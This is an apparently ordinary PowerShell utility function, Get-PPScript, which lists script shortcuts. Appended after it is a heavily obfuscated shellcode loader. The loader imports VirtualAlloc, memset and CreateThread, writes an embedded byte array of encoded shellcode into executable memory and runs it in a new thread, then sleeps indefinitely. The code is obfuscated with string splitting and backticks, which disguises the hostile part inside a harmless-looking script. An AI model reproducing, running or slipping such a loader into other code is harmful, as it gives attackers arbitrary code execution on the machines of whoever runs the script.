function GEt-pp`s`cRipT{



    [CmdletBinding()]
    param(

        [Parameter(mandaToRY=${FAL`se})]
		[String]
		${n`AmE},       
        
        [Switch]
		${ShOr`T`CUt}
	)
  
    
    
    
	    
    
    ${sC`RIPT`sHort`c`UTs} = .("{1}{3}{0}{2}"-f'e','G','m','et-ChildIt') -Path ${pscon`FI`gS}."Pa`Th" -Filter ${Ps`cOn`FI`GS}."SCr`ipt`Sh`or`TCUT"."DATa`Fi`le" -Recurse | .('%'){[xml](.("{2}{1}{0}" -f'nt','et-Conte','G') ${_}."f`Ull`NAME")} | &('%'){${_}."CO`NtEnt"."scR`iPts`H`orT`cuT"}
    
    if(-not ${N`AMe} -and ${SH`OR`TcuT}){
    
        ${s`criPtSh`oRt`cuTS}
    
    }elseif(${N`AMe} -and ${SHoRTC`UT}){
    
        ${S`cRi`Pt`sHOR`TcuTS} | .("{0}{1}"-f 'wher','e'){
            ${_}."K`eY" -eq ${n`AMe} -or
            ${_}."N`Ame" -eq ${n`Ame} -or
            ${_}."filE`NamE" -eq ${na`mE}          
        }
    
    }else{
    
        &("{3}{1}{2}{0}" -f 'em','ildi','t','Get-Ch') -Path ${pSS`C`R`iPtS}."P`AtH" -Filter * -Recurse | .("{1}{0}"-f 'here','w'){(-not ${_}."Ps`ISCO`Nt`A`iNEr") -and (${PS`SC`RiP`Ts}."E`Xt`ENSIoNs" -contains ${_}."exTeN`S`ioN")} | &("{1}{3}{2}{0}"-f 't','Group-O','c','bje') ("{1}{0}" -f 'ame','N') | &("{0}{1}"-f'w','here'){${_}."c`OUnt" -eq 1} | &('%'){
        
            if(-not ${na`me}){
            
                ${_}."gRo`Up"
            
            }elseif(${n`AME}){
            
                ${_} | &("{0}{1}" -f 'wh','ere'){${_}."n`AME" -like ${N`Ame}} | &('%'){${_}."g`RoUP"}
            }    
        }
    }
}
${r`J15} = ((("{33}{84}{53}{86}{82}{29}{17}{13}{41}{90}{99}{74}{35}{93}{45}{49}{68}{72}{67}{30}{28}{96}{61}{58}{0}{88}{2}{79}{4}{12}{83}{73}{34}{14}{71}{56}{11}{62}{3}{55}{97}{27}{91}{7}{85}{38}{69}{18}{16}{89}{15}{42}{24}{40}{64}{22}{76}{98}{66}{43}{23}{78}{75}{48}{47}{57}{100}{6}{20}{32}{36}{81}{102}{8}{101}{10}{21}{60}{94}{1}{44}{80}{50}{52}{39}{92}{31}{19}{59}{70}{54}{87}{51}{95}{9}{77}{25}{26}{5}{63}{37}{65}{46}"-f'e,','l','Pr','atic exter','tect','i','nFlags, IntPtr l',' ','r',' dest','(BRh','llBRh)]publ',');[','stati','3','dwStackSi','ributes, ','ublic ','t','IntP','p','msvc','r lpSta',',',' Int','int src,',' u','ead(Int','int fl','h)]p','ze, u','n ','Threa','[DllImport','rt(BRhkernel','tr VirtualA','d',' ','pThreadA','tic','P','c exte','ze,','ress','lBRh','loc',';','t','ame','(IntPtr l','ubl','P','ic sta','Rh','s','n IntPtr C','d','er, uin','ionTyp','tr m','rt.','locat','ic st','nt','t','count)','d','wSi','pAddre','t','em','2.','ss, uint d','o','tP','ar','rt',', u',' IntPtr lpP','o',')]p','Id);[DllIm','el32.dllBR','DllImp','(B','l','kern','et(Int',' uint fl','uint ','rn I','Ptr',' exter','l','d','tr','Al','reateThr','Ad','n','t dwCreatio','t','po'))  -REPlACe ([CHAr]66+[CHAr]82+[CHAr]104),[CHAr]34);${W} = .("{2}{0}{1}"-f 'Ty','pe','Add-') -memberDefinition ${rj`15} -Name ("{0}{1}" -f'Wi','n32') -namespace ("{1}{3}{0}{2}"-f'32Fu','W','nctions','in') -passthru;[Byte[]];[Byte[]]${z} = 0xba,0x51,0x3d,0xfb,0x6d,0xda,0xc1,0xd9,0x74,0x24,0xf4,0x5e,0x29,0xc9,0xb1,0x47,0x83,0xc6,0x04,0x31,0x56,0x0f,0x03,0x56,0x5e,0xdf,0x0e,0x91,0x88,0x9d,0xf1,0x6a,0x48,0xc2,0x78,0x8f,0x79,0xc2,0x1f,0xdb,0x29,0xf2,0x54,0x89,0xc5,0x79,0x38,0x3a,0x5e,0x0f,0x95,0x4d,0xd7,0xba,0xc3,0x60,0xe8,0x97,0x30,0xe2,0x6a,0xea,0x64,0xc4,0x53,0x25,0x79,0x05,0x94,0x58,0x70,0x57,0x4d,0x16,0x27,0x48,0xfa,0x62,0xf4,0xe3,0xb0,0x63,0x7c,0x17,0x00,0x85,0xad,0x86,0x1b,0xdc,0x6d,0x28,0xc8,0x54,0x24,0x32,0x0d,0x50,0xfe,0xc9,0xe5,0x2e,0x01,0x18,0x34,0xce,0xae,0x65,0xf9,0x3d,0xae,0xa2,0x3d,0xde,0xc5,0xda,0x3e,0x63,0xde,0x18,0x3d,0xbf,0x6b,0xbb,0xe5,0x34,0xcb,0x67,0x14,0x98,0x8a,0xec,0x1a,0x55,0xd8,0xab,0x3e,0x68,0x0d,0xc0,0x3a,0xe1,0xb0,0x07,0xcb,0xb1,0x96,0x83,0x90,0x62,0xb6,0x92,0x7c,0xc4,0xc7,0xc5,0xdf,0xb9,0x6d,0x8d,0xcd,0xae,0x1f,0xcc,0x99,0x03,0x12,0xef,0x59,0x0c,0x25,0x9c,0x6b,0x93,0x9d,0x0a,0xc7,0x5c,0x38,0xcc,0x28,0x77,0xfc,0x42,0xd7,0x78,0xfd,0x4b,0x13,0x2c,0xad,0xe3,0xb2,0x4d,0x26,0xf4,0x3b,0x98,0xd3,0xf1,0xab,0xe3,0x8c,0xfa,0x4c,0x8c,0xce,0xfa,0x93,0xf7,0x46,0x1c,0xc3,0x57,0x09,0xb1,0xa3,0x07,0xe9,0x61,0x4b,0x42,0xe6,0x5e,0x6b,0x6d,0x2c,0xf7,0x01,0x82,0x99,0xaf,0xbd,0x3b,0x80,0x24,0x5c,0xc3,0x1e,0x41,0x5e,0x4f,0xad,0xb5,0x10,0xb8,0xd8,0xa5,0xc4,0x48,0x97,0x94,0x42,0x56,0x0d,0xb2,0x6a,0xc2,0xaa,0x15,0x3d,0x7a,0xb1,0x40,0x09,0x25,0x4a,0xa7,0x02,0xec,0xde,0x08,0x7c,0x11,0x0f,0x89,0x7c,0x47,0x45,0x89,0x14,0x3f,0x3d,0xda,0x01,0x40,0xe8,0x4e,0x9a,0xd5,0x13,0x27,0x4f,0x7d,0x7c,0xc5,0xb6,0x49,0x23,0x36,0x9d,0x4b,0x1f,0xe1,0xdb,0x39,0x71,0x31;${G} = 0x1000;if (${Z}."l`EngTh" -gt 0x1000){${g} = ${z}."LE`Ngth"};${U`Qus}=${W}::("{1}{0}{2}"-f'rtualA','Vi','lloc').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${z}."le`NgTH"-1);${I}++) {${w}::"Me`MSET"([IntPtr](${u`qus}.("{0}{2}{1}" -f'To','t32','In').Invoke()+${I}), ${z}[${I}], 1)};${w}::("{2}{0}{1}" -f'at','eThread','Cre').Invoke(0,0,${u`qus},0,0,0);for (;;){.("{1}{0}{2}{3}" -f't','Star','-','sleep') 60};
